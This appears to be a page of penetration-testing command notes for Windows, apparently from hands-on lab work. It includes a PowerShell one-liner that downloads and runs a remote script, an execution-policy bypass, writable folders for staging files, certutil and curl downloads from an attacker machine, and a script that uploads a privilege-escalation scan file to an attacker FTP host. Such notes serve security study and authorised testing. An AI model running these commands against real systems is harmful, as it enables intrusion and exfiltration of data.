CLI Tips

Powershell

Load Powershell Module Over HTTP

Load Powershell Module Over HTTP:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');'

Bypass Powershell Execution Policy

If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:

powershell.exe -ExecutionPolicy Bypass

Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discovery.

  • Check in powershell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit Powershell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • This path should exist for 32-bit applications even if you can't see it because it is virtual.

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.

View Hidden Files

Get-ChildItem -Force

Running Powershell commands from CMD

You can do it like this, but you need to press enter to get the output. 

powershell -command "whoami"

Writable Folders

Default Writeable Folders:

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public

Transferring Files

HTTP Download

Start an HTTP server on your Linux machine: 

python3 -m http.server

Download file over HTTP using curl (in case it's installed in Powershell): 

curl http://IP:PORT/file.exe -O ./file.exe

Download file using certutil: 

certutil.exe -f -urlcache http://IP:PORT/path/filename.exe filename.exe

FTP Upload

Start an FTP server on your linux machine: 

pip3 install pyftpdlib 
python3 -m pyftpdlib --username myuser --password mypass --write

If you don't specify username and password, then you can log in with user anonymous and no password.

$File = "C:\Users\svc-alfresco\Documents\winpeas.txt";
$ftp = "ftp://myuser:mypass@10.10.14.141:2121/winpeas.txt";                    
$webclient = New-Object -TypeName System.Net.WebClient;
$uri = New-Object -TypeName System.Uri -ArgumentList $ftp;
$webclient.UploadFile($uri, $File);

PreviousWindowsNextShells

Last updated